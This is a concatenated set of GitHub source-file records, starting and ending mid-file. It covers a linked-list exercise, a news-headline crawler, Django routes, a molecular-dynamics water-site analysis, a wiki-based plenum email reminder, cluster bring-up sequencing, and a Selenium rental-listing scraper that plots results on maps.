__init__(self, node_data):\n self.data = node_data\n self.next = None\n\nclass SinglyLinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def insert_node(self, node_data):\n node = SinglyLinkedListNode(node_data)\n\n if not self.head:\n self.head = node\n else:\n self.tail.next = node\n\n\n self.tail = node\n\ndef compare_lists(llist1, llist2):\n curr1 = llist1\n curr2 = llist2\n\n same = True\n\n while (curr1 and curr2):\n if curr1.data != curr2.data:\n same = False\n break\n curr1 = curr1.next\n curr2 = curr2.next\n\n if ((curr1 and not curr2) or (curr2 and not curr1)):\n same = False\n\n return same\n\ndef main():\n node1 = SinglyLinkedListNode(1)\n node2 = SinglyLinkedListNode(2)\n\n node3 = SinglyLinkedListNode(1)\n node4 = SinglyLinkedListNode(2)\n\n node1.next = node2\n node3.next = node4\n\n print (compare_lists(node1, node3))\n\nif __name__ == \"__main__\":\n main()","repo_name":"ymwondimu/HackerRank","sub_path":"Subset_DataStructures/compare_linked_list.py","file_name":"compare_linked_list.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39564180365","text":"# -*- coding: utf-8 -*-\r\n'''\r\nstep01_newsCrawling\r\n\r\n1. news Crawling\r\n url : http://media.daum.net\r\n2. pickle save\r\n binary file save\r\n'''\r\nimport urllib.request as req # url 요청\r\nfrom bs4 import BeautifulSoup # html 파싱\r\nimport pickle\r\n\r\n\r\n# 1. url = 'http://media.daum.net'\r\nurl = 'http://media.daum.net'\r\n\r\n# 1-1) url 요청\r\nres = req.urlopen(url)\r\nsrc = res.read() # source\r\nprint(src) # 한글깨짐현상\r\n\r\n# 1-2) html 파싱\r\nsrc = src.decode('utf-8') # 디코딩 <한글깨짐현상을 막아줌>\r\nhtml = BeautifulSoup(src, 'html.parser') # < html문서로 변경>\r\nprint(html) # 한글출력\r\n\r\n# 1-3) tag[속성='값'] -> \"a[class='link_txt']\"\r\nlinks = html.select(\"a[class='link_txt']\")\r\nprint(len(links)) # 62\r\nprint(links)\r\n\r\n# 1-4) 기사 내용만 추출\r\ncrawling_data = [] # 빈 list\r\nfor link in links:\r\n link_str = str(link.string) # 내용만 추출후 문자타입으로 변경\r\n crawling_data.append(link_str.strip()) # 문장끝 불용어 처리(\\n, 공백) , 빈 list에 삽입\r\nprint(crawling_data)\r\nprint(len(crawling_data)) # 62개 문장\r\n\r\n\r\n# 1-5) pickle file save\r\nfile = open(\"../data/new_crawling.pickle\", mode='wb')\r\npickle.dump(crawling_data, file)\r\nprint('pickle file saved')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"yangmyongho/4_Python-II2","sub_path":"chap07_TextMining/lecture01_Crawling/step01_newsCrawling.py","file_name":"step01_newsCrawling.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23150174281","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('website.views',\n url(r'^$', 'home',name='home'),\n url(r'^$', 'sign_out',name='sign_out'),\n url(r'^$', 'sign_in',name='sign_in'),\n url(r'^$', 'register',name='register'),\n url(r'^contact_us$', 'contact_us', name='contact_us'),\n url(r'^members$','members',name='members'),\n url(r'^life$','life',name='life'),\n url(r'^devel$','devel', name='devel'),\n url(r'^summer$','summer', name='summer'),\n)\n\n","repo_name":"ogu2/MIT-dh-website","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1521756","text":"# The code for the manuscript: \n# LAWS: Local Alignment for Water Sites - tracking ordered water in simulations\n# Authors: Eugene Klyshko, Justin Kim, and Sarah Rauscher\n# References in the code are related to the main text of the manuscript\n# \n# Developer: Eugene Klyshko\n\n# This code generates bulk water sites (> 6 A from the protein) and computes offset vectors from the nearest water molecules to each bulk water site\n# in each frame of the MD simulation\n\n## (!) User should adjust these parameters according to their system and file names (1-2):\n\n# 1. Path to a simulation structure and trajectory (which includes positions of all water molecules)\ntraj_folder = './'\nstruct = traj_folder + 'firstframe.gro'\ntrajectory = traj_folder + 'trajectory.xtc'\n\n# 2. Parameters of the system and trajectory\nstride = 10 # Stride for analysis (when stride=10 we will analyze only every 10-th frame of the original trajectory)\nN_chains = 4 # Number of symmetric chains in the simulation. In the manuscript, we have a unit cell with 4 protein chains. \nN_atoms_in_chain = 1473 # Number of protein atoms in each chain.\nn_waters = 120 # Number of bulk water sites to generate\n\n# import useful libraries, such as MDAnalysis, and necessary functions\nimport MDAnalysis as md\nimport numpy as np\nimport sys\nfrom MDAnalysis.analysis import align\nfrom MDAnalysis.analysis.distances import distance_array\nfrom MDAnalysis.lib.distances import apply_PBC, augment_coordinates\n\n# import function necessary for analysis of a simulation\nfrom laws import (\n find_chains,\n find_offsets\n)\n\n# This function assumes that atomic coordinates are written consequtively (chain by chain) in the structure file from the very beginning of the file.\n# It creates MDAnalysis selection for each chain (can be applied to both CRYSTAL_STRUCTURE and MD struct) for further analysis\nif N_chains >= 1:\n chains = find_chains(N_chains, N_atoms_in_chain)\n\n# Loading the system into MDAnalysis universe:\ntraj = md.Universe(struct, trajectory)\nprint(\"Information about trajectory\", trajectory)\nframes = len(traj.trajectory) # Determine number of frames in the trajectory\ntimesteps = len(range(0, frames, stride)) - 1 # Determine number of frames to be used in analysis, including only every stride-th frame\n\n# memory allocation for offset vectors, distances (magnitudes of offset vectors)\ndistances = np.empty((timesteps, n_waters), dtype=np.float)\noffsets = np.empty((timesteps, n_waters, 3), dtype=np.float)\n\n## Pipeline: \nall_waters = traj.select_atoms('name OW') # selecting all water oxygens\nprotein_atoms = traj.select_atoms('protein') # selecting all protein atoms\n\n# Bulk water sites are generated as the positions at least 6 A from the protein. \n# A nice quick trick - to do it with MDAnalysis: (i) choose water molecules which are more than 6 A from the protein (in the first frame), \n# and (ii) use their positions (in the first frame) as bulk water sites. \n# Note (!) make sure there are more of such waters than your desired number in n_waters. Selecting the first n_waters and their coordinates:\nbulk_water_sites = traj.select_atoms('name OW and not around 6.0 (protein and not type H)').atoms[:n_waters].positions.copy()\n\n# Looping over all time frames\nfor t, ts in enumerate(traj.trajectory[0:frames:stride]):\n \n # Computing distances to the closest water taking into account preiodic images\n box = ts.dimensions # box dimensions for treating periodic boundary conditions\n dist_mtx = distance_array(\n bulk_water_sites,\n all_waters.atoms.positions,\n box=box,\n backend='OpenMP'\n )\n distances[t] = np.min(dist_mtx, axis=1)\n \n # Finding offset vectors to the closest water taking into account preiodic images\n nearest_water_indeces = np.argmin(dist_mtx, axis=1)\n nearest_water_positions = all_waters.atoms[nearest_water_indeces].positions\n offsets[t] = find_offsets(\n nearest_water_positions,\n bulk_water_sites.astype(np.float32),\n dist_mtx,\n box\n )\n \n # printing progress\n if t % 10 == 0:\n print(\"Timestep: {} out of {}\".format(t, timesteps))\n\n# filename to save all the results in npy array\nfilename_to_save = 'bulk'\nnp.save(filename_to_save + '_offsets', offsets) # Offset vectors r, shape (chains, frames, 3)\nnp.save(filename_to_save + '_distances', distances) # Magnitudes of offset vectors, shape (chains, frames, 1)\n","repo_name":"rauscher-lab/LAWS","sub_path":"compute_bulk_r.py","file_name":"compute_bulk_r.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"72557017833","text":"def addToInventory(inventory, addedItems):\n for item in addedItems:\n inventory.setdefault(item, 0)\n inventory[item] += 1\n return inventory\n\ndef displayInventory(inventory):\n print('Inventory:')\n for k, v in inventory.items():\n print(str(v).rjust(2,' '), k)\n\nif __name__ == '__main__':\n inv = {'gold coin': 42, 'rope': 1}\n dragonLoot = ['gold coin', 'dagger', 'gold coin', 'gold coin', 'ruby']\n inv = addToInventory(inv, dragonLoot)\n displayInventory(inv)\n\n import sys\n sys.exit(0)","repo_name":"HeroIsNothing/Practice","sub_path":"python/python-automate-work/ch05-dict/04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17902196700","text":"import time\nimport argparse\n\nimport access\nimport command\nimport deploy\nimport infra\nimport setup\nimport configuration\nimport verify\n\n\ndef sequence_keysystem(ops: setup.Operations) -> None:\n ops.add_subcommand(setup.setup_keyserver)\n ops.add_operation(\"verify that keyserver static files can be fetched\",\n iterative_verifier(verify.check_keystatics, 10.0))\n ops.add_subcommand(setup.admit_keyserver)\n if configuration.get_config().is_kerberos_enabled():\n ops.add_subcommand(setup.setup_keygateway)\n ops.add_operation(\"verify that the keygateway is responsive\", verify.check_keygateway)\n else:\n ops.add_operation(\"skip keygateway enablement (kerberos is disabled)\", lambda: None)\n\n\ndef sequence_ssh(ops: setup.Operations) -> None:\n ops.add_operation(\"request SSH access to cluster\", access.access_ssh_with_add)\n ops.add_subcommand(setup.setup_supervisor_ssh)\n ops.add_operation(\"verify ssh access to supervisor\", iterative_verifier(verify.check_ssh_with_certs, 20.0))\n\n\ndef sequence_supervisor(ops: setup.Operations) -> None:\n config = configuration.get_config()\n ops.add_subcommand(sequence_keysystem)\n ops.add_operation(\"verify that keysystem certs are available on supervisor\", iterative_verifier(verify.check_certs_on_supervisor, 20.0))\n ops.add_subcommand(setup.setup_prometheus)\n ops.add_subcommand(sequence_ssh)\n ops.add_subcommand(setup.setup_bootstrap_registry)\n ops.add_subcommand(setup.update_registry)\n\n ops.add_operation(\"pre-deploy flannel\", deploy.launch_flannel)\n ops.add_operation(\"pre-deploy dns-addon\", deploy.launch_dns_addon)\n ops.add_operation(\"pre-deploy flannel-monitor\", deploy.launch_flannel_monitor)\n ops.add_operation(\"pre-deploy dns-monitor\", deploy.launch_dns_monitor)\n\n if config.user_grant_domain != '':\n ops.add_operation(\"pre-deploy user-grant\", deploy.launch_user_grant)\n\n # TODO: have a way to do this without a specialized just-for-supervisor method\n ops.add_subcommand(infra.infra_sync_supervisor)\n\n\ndef iterative_verifier(verifier, max_time, pause=2.0):\n def ver():\n end_time = time.time() + max_time\n while True:\n try:\n verifier()\n return\n except Exception as e:\n if time.time() >= end_time:\n raise e\n print(\"Verification failed:\", e)\n print(\"RETRYING...\")\n time.sleep(pause)\n\n command.provide_command_for_function(ver, command.get_command_for_function(verifier))\n ver.dispatch_get_name = lambda default: command.get_command_for_function(verifier)\n\n return ver\n\n\ndef sequence_cluster(ops: setup.Operations) -> None:\n ops.add_operation(\"verify that the fundamental cluster infrastructure is online\",\n iterative_verifier(verify.check_online, 120.0))\n\n ops.add_operation(\"verify that etcd has launched successfully\",\n iterative_verifier(verify.check_etcd_health, 120.0))\n ops.add_operation(\"verify that kubernetes has launched successfully\",\n iterative_verifier(verify.check_kube_health, 120.0))\n\n ops.add_operation(\"verify that containers can be pulled from the registry\", iterative_verifier(verify.check_pull, 60.0))\n ops.add_operation(\"verify that flannel is online\", iterative_verifier(verify.check_flannel, 210.0))\n ops.add_operation(\"verify that dns-addon is online\", iterative_verifier(verify.check_dns, 120.0))\n\n\ndef add_dry_run_argument(parser: argparse.ArgumentParser, dest: str):\n parser.add_argument(\"--dry-run\", dest=dest, action=\"store_true\", help=\"show command sequence performed by command without actually running them\")\n\n\ndef wrapseq(desc: str, f):\n def wrap_param_tx(opts):\n ops = setup.Operations()\n\n def invoke():\n dry_run = opts.get('dry_run', False)\n dry_run_outer = opts.get('dry_run_outer', False)\n if dry_run or dry_run_outer:\n ops.print_annotations()\n else:\n ops.run_operations()\n\n new_opts = {'ops': ops, **opts}\n\n return new_opts, invoke\n\n desc, inner_configure = command.wrap(desc, f, wrap_param_tx)\n\n def configure(command: list, parser: argparse.ArgumentParser):\n add_dry_run_argument(parser, \"dry_run\")\n inner_configure(command, parser)\n\n return desc, configure\n\n\ndef seq_mux_map(desc, mapping):\n desc, inner_configure = command.mux_map(desc, mapping)\n\n def configure(command: list, parser: argparse.ArgumentParser):\n # allow --dry-run to be present before selector and also have it appear in the help message\n add_dry_run_argument(parser, \"dry_run_outer\")\n inner_configure(command, parser)\n\n return desc, configure\n\n\nmain_command = seq_mux_map(\"commands about running large sequences of cluster bring-up automatically\", {\n \"keysystem\": wrapseq(\"set up and verify functionality of the keyserver and keygateway\", sequence_keysystem),\n \"ssh\": wrapseq(\"set up and verify ssh access to the supervisor node\", sequence_ssh),\n \"supervisor\": wrapseq(\"set up and verify functionality of entire supervisor node (keysystem + ssh)\",\n sequence_supervisor),\n \"cluster\": wrapseq(\"set up and verify kubernetes infrastructure operation\", sequence_cluster),\n})\n","repo_name":"proganalysis/python3_types","sub_path":"Result/4079files/source/2948.py","file_name":"2948.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"16569772354","text":"#lab 08\n'''\nf=[]\nl=input(\"enter a number to define the length of the string: \")\nif((isinstance(l,int))):\n for i in range(l):\n f.append(str(input(\"enter a number to add to the list: \")))\n print(f)\n#else:\n# l=input(\"you did not enter a number\\nplease enter a number to define the length of the string: \")\n\n\n\n'''\nfb=[1,2,3,5,8,13]\nboolean=\"True\"\n\nfor i in range(2,len(fb)):\n print(str(fb[i]) + \",\" + str(fb[i-1]) + \",\" +str(fb[i-2]))\n if fb[i]==(fb[i-1]+fb[i-2]):\n continue\n else:\n boolean=\"False\"\n break\n\nif boolean==\"True\":\n print(\"FIBO!!!!\")\nelse:\n print(\"NOT FIBO\")\n\n\n#while(True):\n#i=input(\"enter first #:\\n\")","repo_name":"hweber01/DEVOPS","sub_path":"LESSON 01/LAB08.py","file_name":"LAB08.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15230593519","text":"#!~/usr/bin/python3.2\n\nimport copy\n\nfilename = 'D-large.in'\n\nFILE = open(filename)\nT = int(FILE.readline())\n\ndef solve(keys,chests, order):\n for i,chest in enumerate(chests):\n available_moves = set([key for key in keys if keys[key] > 0])\n if chest['req'] in available_moves:\n newKeys = copy.copy(keys)\n newKeys[chest['req']] -= 1\n for key in chest['con']: newKeys[key] += 1\n\n newChests = chests[:i] + chests[i+1:]\n newOrder = copy.copy(order)\n newOrder.append(chest['ix'])\n\n if len(newChests) == 0: return str(newOrder)\n\n if solvable(newKeys,newChests):\n temp = solve(newKeys,newChests,newOrder)\n if (temp != 'IMPOSSIBLE'): return temp\n\n return 'IMPOSSIBLE'\n\ndef solvable(keys,chests):\n #If we cheat, can we win?\n for chest in chests: chest['flag'] = 0\n\n keySet = set([key for key in keys if keys[key] >= 1])\n if len(keySet) < 1: return False\n\n flag = 1 #something occurring\n while flag:\n flag = 0\n for chest in chests:\n if (chest['req'] in keySet) and (chest['flag'] == 0):\n flag = 1\n chest['flag'] = 1\n keySet = keySet.union(set(chest['con']))\n\n for chest in chests:\n if chest['flag'] == 0: return False\n\n #Is the final state positive for all keys?\n num = copy.copy(keys)\n\n for chest in chests:\n num[chest['req']] -= 1\n for k in chest['con']:\n num[k] += 1\n\n for i in num:\n if num[i] < 0: return False\n\n return True\n\nfor t in range(1,T+1):\n k,n = [int(x) for x in FILE.readline().split(' ')]\n keys = {i:0 for i in range(1,201)}\n for key in [int(x) for x in FILE.readline().split(' ')]: keys[key] += 1\n\n chests = []\n for i in range(0,n):\n raw = FILE.readline().split(' ')\n chests.append( { 'req':int(raw[0]), 'con':[int(x) for x in raw[2:]], 'ix':i+1 } )\n\n\n if solvable(keys,chests):\n sol = solve(keys,chests,[])\n if sol != 'IMPOSSIBLE':\n sol = str(sol)[1:-1].split(', ')\n sol = ' '.join(sol)\n else:\n sol = 'IMPOSSIBLE'\n print('Case #' + str(t) + ': ' + sol)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/13/04/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"36313673137","text":"import datetime\nimport logging\n\nimport config\nimport docs\nimport models\n\nfrom google.appengine.ext.deferred import defer\nfrom google.appengine.ext import ndb\n\n\ndef intClamp(v, low, high):\n \"\"\"Clamps a value to the integer range [low, high] (inclusive).\n\n Args:\n v: Number to be clamped.\n low: Lower bound.\n high: Upper bound.\n\n Returns:\n An integer closest to v in the range [low, high].\n \"\"\"\n return max(int(low), min(int(v), int(high)))\n\n\ndef updateAverageRating(review_key):\n \"\"\"Helper function for updating the average rating of a product when new\n review(s) are added.\"\"\"\n\n def _tx():\n review = review_key.get()\n v = review.video_key.get()\n if not review.rating_added:\n review.rating_added = True\n v.num_reviews += 1\n v.avg_rating = (v.avg_rating +\n (review.rating - v.avg_rating) / float(v.num_reviews))\n # signal that we need to reindex the doc with the new ratings info.\n v.needs_review_reindex = True\n ndb.put_multi([v, review])\n # We need to update the ratings associated document at some point as well.\n # If the app is configured to have BATCH_RATINGS_UPDATE set to True, don't\n # do this re-indexing now. (Instead, all the out-of-date documents can be\n # be later handled in batch -- see cron.yaml). If BATCH_RATINGS_UPDATE is\n # False, go ahead and reindex now in a transational task.\n if not config.BATCH_RATINGS_UPDATE:\n defer(\n models.Video.updateVideoDocWithNewRating,\n v.key.id(),\n _transactional=True)\n return (v, review)\n\n try:\n # use an XG transaction in order to update both entities at once\n ndb.transaction(_tx, xg=True)\n except AttributeError:\n # swallow this error and log it; it's not recoverable.\n logging.exception('The function updateAverageRating failed. Either review '\n + 'or product entity does not exist.')\n\n\ndef dateFromDateString(date_string):\n if not date_string or date_string.strip() == '-':\n return ''\n timedate_formats = ['%Y-%m-%dT%H:%M:%S.%fZ', '%Y-%m-%d %H:%M:%S', '%m/%d/%Y %H:%M:%S']\n result = None\n for f in timedate_formats:\n try:\n result = datetime.datetime.strptime(date_string, f)\n break\n except ValueError:\n continue\n if not result:\n raise ValueError('Unexpected timedate format! (%s)' % date_string)\n return result\n","repo_name":"miketruty/public","sub_path":"py/cloud_next_library/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12071713246","text":"def csvwrite(path, vottotal):\n import csv\n import platform # importamos las funciones nescesarias\n import modulos.checkdatos as datos\n\n header = [\"DNI, REGION, CARGO, PARTIDO\"] # definimos un header y un fin para el csv\n fin = [\"FIN\"]\n\n rows, error = datos.vervoto(vottotal, path) # Llamamos la funcion vervoto de checkdatos.py\n\n if platform.system() == 'Windows':\n csvfile = path + \"\\csv\\\\votos.csv\"\n elif platform.system() == 'Linux': # fix de carpeta para compatibilidad con linux y windows\n csvfile = path + '/csv/votos.csv'\n \n with open (csvfile, \"w\") as votos: # Escribimos el csv\n writer = csv.writer(votos)\n writer.writerow(header) \n writer.writerows(rows)\n writer.writerow(fin)\n return error","repo_name":"marcosvillar4/Etapa-2-","sub_path":"modulos/votacionwrite.py","file_name":"votacionwrite.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27605857912","text":"# -*- coding: utf-8 -*-#\r\n# Author: Liangliang\r\n# Date: 2019\\4\\1 0001 20:46:46\r\n# File: LKPE.py\r\n# Software: PyCharm\r\n#------------------------------------\r\n\r\nimport numpy as np\r\nimport math\r\n\r\ndef LKPE(data, m):\r\n '''\r\n\tElbagoury A, Ibrahim R, Kamel M S, et al. EBEK: Exemplar-Based Kernel Preserving Embedding[C]//IJCAI. 2016: 1441-1447.主要完成的是降维操作\r\n data:输入的数据,每一行代表一个样本,每一列代表一个特征 n*d\r\n m: 降维后数据的维数\r\n '''\r\n epsilon = 0.64 #原文算法2中epsilon参数\r\n n = data.shape[0] #数据的样本数\r\n d = data.shape[1] #数据的维数\r\n A = data.transpose() #将输入的数据进行转置,与文中的参数的形式保持一致\r\n U, Sigma, V = np.linalg.svd(A) #对A进行奇异值分解\r\n if len(Sigma)>=m:\r\n Sigma = np.diag(Sigma[0:m])\r\n else:\r\n Sigma = np.diag(Sigma,m)\r\n #选择出m个独立的样本\r\n E = [0] #用于记录选择出来的列\r\n size = 0\r\n for i in range(1,min(m,n)):\r\n ai = A[:,[i]]\r\n for j in range(0,size):\r\n aj = A[:,[E[j]]]\r\n ai = ai - sum(ai*aj)/sum((aj*aj)*aj)\r\n if np.linalg.norm(ai,1)!=0:\r\n for ii in range(len(E)):\r\n if np.dot(A[:,ii],A[:,[i]]) <= epsilon:\r\n size = size + 1\r\n E.append(i)\r\n break\r\n if len(E) 0:\n if(x[y-1] == 'c'):\n print(x[y-1])\n y-=1\n break;\n\ni =0;\nx = ['a','c']\nwhile i < len(x):\n if(x[i] == 'c'):\n print(x[i])\n i+=1\n \n \n\n\n# In[3]:\n\nlist = [1,2,3,43] \nfor i in list:\n print(i)\n\n\n# In[4]:\n\niterator = iter(list)\nnext(iterator)\n\n\n# In[8]:\n\nnext(iterator)\n\n\n# In[9]:\n\nlist = ['abc', 'def','ghi']\nstrIterator = iter(list)\nnext(strIterator)\n\n\n# In[ ]:\n\n\n\n","repo_name":"sasidhar20/python","sub_path":"Iterator.py","file_name":"Iterator.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32927721538","text":"#!/usr/bin/env python3\n\n\"\"\"\nPlenum-Reminder, by Kunsi\n\nTo be executed by a cronjob every day at 00:01\nChecks wether a Plenum is scheduled for the next day, if yes, it\nsends out a mail notification to the intern mailing list.\n\"\"\"\n\nfrom datetime import date, timedelta\nfrom locale import setlocale, LC_ALL\nfrom os import environ\nfrom sys import argv, exit\n\nfrom email.mime.text import MIMEText\nfrom requests import get\nfrom smtplib import SMTP\n\nURL = argv[1]\n\nDEBUG = environ.get(\"DEBUG\", \"0\") == \"1\"\nDAYS = int(environ.get(\"DELTA_DAYS\", 1))\n\ntomorrow = date.today() + timedelta(days=DAYS)\n\n\ndef find_between(s, first, last):\n try:\n start = s.index(first) + len(first)\n end = s.index(last, start)\n return s[start:end]\n except ValueError:\n return\n\n\nsetlocale(LC_ALL, \"de_DE.UTF-8\")\nwiki = get(URL).content.decode(\"utf-8\")\n\nplenum_tops = None\nfor date_format in (\"%Y-%m-%d\", \"%d.%m.%Y\"):\n start = \"{} ===\".format(tomorrow.strftime(date_format))\n plenum_tops = find_between(wiki, start, \"=== \")\n\n if plenum_tops:\n break\nelse:\n # Catch a corner case for the first plenum on a page\n plenum_tops = find_between(wiki, start, \"\")\n\nif plenum_tops:\n template = \"\"\"Hallo,\nmorgen ist (laut Wiki) wieder mal Plenum. Nachfolgend die Tagesordnungs-\npunkte aus dem Wiki:\n\n{}\"\"\".format(\n plenum_tops.strip()\n )\n\n if DEBUG:\n print(template)\n exit(0)\n\n msg = MIMEText(template)\n msg[\"Subject\"] = \"Plenum am %s\" % tomorrow.strftime(\"%A, %d.%m.%Y\")\n msg[\"From\"] = argv[2]\n msg[\"To\"] = argv[3]\n\n smtpObj = SMTP(\"localhost\")\n smtpObj.send_message(msg)\n smtpObj.quit()\nelif DEBUG:\n print(wiki)\n exit(1)\n","repo_name":"entropia/reminders","sub_path":"plenum.py","file_name":"plenum.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2446053971","text":"from decouple import config\nfrom ipyleaflet import AwesomeIcon, Map, Marker\nfrom ipywidgets import HTML\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom time import sleep\nimport bs4\nimport datetime\nimport folium\nimport googlemaps\nimport ipyleaflet\nimport numpy as np\nimport pandas as pd\nimport re\n\n\ndef find_clean_entry(link, entry):\n string_value = link.find_all(attrs={entry})\n if string_value:\n string_value = string_value[0].text\n string_value = string_value.replace(\"\\n\", \"\")\n string_value = re.sub(\"\\\\s+\", \" \", string_value)\n string_value = re.sub(\"\\\\s+$|^\\\\s+\", \"\", string_value)\n return string_value\n else:\n return None\n\n\ndef apartment_parser(link):\n ap = {\n \"endereco\": find_clean_entry(link, \"property-card__address\"),\n \"aluguel\": find_clean_entry(link, \"property-card__price\"),\n \"cond\": find_clean_entry(link, \"js-condo-price\"),\n \"vagas\": find_clean_entry(link, \"property-card__detail-garage\"),\n \"banheiros\": find_clean_entry(link, \"property-card__detail-bathroom\"),\n \"quartos\": find_clean_entry(link, \"property-card__detail-room\"),\n \"area\": find_clean_entry(link, \"property-card__detail-area\"),\n \"amenidades\": \", \".join(\n [i.text for i in link.find_all(attrs={\"amenities__item\"})]\n ),\n \"link\": (\n \"https://www.vivareal.com.br\"\n + link.find_all(attrs={\"js-listing-labels-link\"})[0].get(\"href\")\n ),\n }\n return ap\n\n\ndef get_results(bairro, filtro):\n main_site = \"https://www.vivareal.com.br/aluguel/sp/campinas/\"\n button_next_page = '//button[@class=\"js-change-page\" and @title=\"Próxima página\"]'\n url = main_site + bairro + \"/\" + filtro\n browser = webdriver.Firefox()\n browser.get(url)\n sleep(3)\n aps_list = []\n next_page = False\n count = 1\n # extra timer for page to load\n sleep(1)\n while not next_page:\n print(\"Scrapping page: \" + str(count))\n # next_page = re.sub(\"#\", \"?\", next_page)\n # url = main_site + bairro + \"/\" + next_page + filtro\n # print(url)\n # browser.get(url)\n # browser.find_element(By.XPATH, button_next_page).click()\n # find button for next page to be loaded\n # extra timer for page to load\n sleep(2)\n # browser.find_element(By.XPATH, button_next_page).click()\n # element.click()\n # scrap housing info\n html = browser.page_source\n soup = bs4.BeautifulSoup(html, \"html.parser\")\n links = soup.find_all(attrs={\"property-card__container\"})\n for entry in links:\n aps_list.append(apartment_parser(entry))\n # check next page\n paginas = soup.find_all(attrs={\"pagination__item\"})\n next_page = paginas[-1].find(\"button\").has_attr(\"data-disabled\")\n # click on next page\n element = WebDriverWait(browser, 20).until(\n EC.element_to_be_clickable((By.XPATH, button_next_page))\n )\n browser.execute_script(\"arguments[0].click();\", element)\n count = count + 1\n browser.close()\n return aps_list\n\n\ndef randomize_location(x, coord):\n conditions = [\n ((x.entries_by_cluster > 1) & (x.entries_by_cluster < 5)),\n (x.entries_by_cluster > 5),\n (x.entries_by_cluster == 1),\n ]\n choices = [\n x[coord] + np.random.normal(0, 0.0001, x.shape[0]),\n x[coord] + np.random.normal(0, 0.0005, x.shape[0]),\n x[coord],\n ]\n return np.select(conditions, choices)\n\n\ndef addApartment(map_, a):\n popup = folium.Popup(a._popup_(), max_width=450)\n folium.Marker(\n location=[a.lat, a.lon],\n popup=popup,\n # I can use fontawesome to change the pin icon\n icon=folium.Icon(color=\"green\", prefix=\"fa\"),\n ).add_to(map_)\n\n\nclass Apartment:\n def __init__(self, **kwargs):\n self.endereco = kwargs.get(\"endereco\")\n self.aluguel = kwargs.get(\"aluguel\")\n self.cond = kwargs.get(\"cond\")\n self.vagas = kwargs.get(\"vagas\")\n self.banheiros = kwargs.get(\"banheiros\")\n self.quartos = kwargs.get(\"quartos\")\n self.area = kwargs.get(\"area\")\n self.amenidades = kwargs.get(\"amenidades\")\n self.link = kwargs.get(\"link\")\n self.id_address = kwargs.get(\"id\")\n self.lat = kwargs.get(\"lat\")\n self.lon = kwargs.get(\"lon\")\n self.cluster = kwargs.get(\"cluster\")\n\n def _popup_(self):\n return f\"\"\"\n

Info

\n Endereco: {self.endereco}
\n Aluguel: {self.aluguel}
\n Cond: {self.cond}
\n Vagas: {self.vagas}
\n Banheiros: {self.banheiros}
\n Quartos: {self.quartos}
\n Area: {self.area}
\n Amenidades: {self.amenidades}
\n Id_address: {self.id_address}
\n Lat: {self.lat}
\n Lon: {self.lon}
\n Link
\n \"\"\"\n\n\ndef create_map(apartments, filename):\n cps_coords = [-22.8923728, -47.2079813]\n map_ = folium.Map(location=cps_coords, zoom_start=10)\n\n interesting_coords = [-22.914183, -47.063295]\n\n # add central marker\n marker1 = folium.Marker(\n location=interesting_coords,\n popup=\"Point of interest\",\n # don't use single quotes, only double quotes\n icon=folium.Icon(name=\"circle\", color=\"red\", icon_color=\"black\"),\n )\n marker1.add_to(map_)\n\n # add circles at central point\n folium.Circle(\n location=interesting_coords, radius=5000, color=\"green\", opacity=0.5, weight=2\n ).add_to(map_)\n folium.Circle(\n location=interesting_coords, radius=10000, color=\"yellow\", opacity=0.5, weight=2\n ).add_to(map_)\n folium.Circle(\n location=interesting_coords, radius=15000, color=\"orange\", opacity=0.5, weight=2\n ).add_to(map_)\n folium.Circle(\n location=interesting_coords, radius=20000, color=\"red\", opacity=0.5, weight=2\n ).add_to(map_)\n\n # add apartments\n for entry in apartments:\n addApartment(map_, entry)\n\n # save map\n map_.save(filename)\n\n\ndef create_map_ipyleaflet(apartments):\n cps_coords = [-22.8923728, -47.2079813]\n map_ = Map(center=cps_coords)\n\n interesting_coords = [-22.9174636, -47.0597494]\n\n # add central marker\n marker1 = Marker(\n location=interesting_coords,\n popup=HTML(value=\"Point of interest\"),\n # don't use single quotes, only double quotes\n icon=AwesomeIcon(name=\"circle\", marker_color=\"red\", icon_color=\"black\"),\n )\n map_.add_layer(marker1)\n\n # add circles at central point\n ipyleaflet.Circle(\n location=interesting_coords, radius=5000, color=\"green\", opacity=0.5, weight=2\n ).add_to(map_)\n ipyleaflet.Circle(\n location=interesting_coords, radius=10000, color=\"yellow\", opacity=0.5, weight=2\n ).add_to(map_)\n 